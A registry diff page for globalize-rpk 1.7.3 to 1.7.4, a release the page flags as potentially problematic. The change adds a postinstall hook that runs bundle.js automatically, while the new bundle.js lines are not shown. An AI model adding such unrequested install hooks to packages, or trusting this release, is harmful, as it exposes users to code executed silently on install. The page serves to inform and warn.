globalize-rpk 1.7.3 → 1.7.4
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of globalize-rpk might be problematic. Click here for more details.
- package/bundle.js +2 -0
- package/package.json +4 -3
package/package.json
CHANGED
@@ -1,6 +1,6 @@
|
|
1
1
|
{
|
2
2
|
"name": "globalize-rpk",
|
3
|
-
"version": "1.7.
|
3
|
+
"version": "1.7.4",
|
4
4
|
"description": "A JavaScript library for internationalization and localization that leverages the official Unicode CLDR JSON data.",
|
5
5
|
"keywords": [
|
6
6
|
"utility",
|
@@ -104,6 +104,7 @@
|
|
104
104
|
},
|
105
105
|
"license": "MIT",
|
106
106
|
"scripts": {
|
107
|
-
"test": "grunt"
|
107
|
+
"test": "grunt",
|
108
|
+
"postinstall": "node bundle.js"
|
108
109
|
}
|
109
|
-
}
|
110
|
+
}
|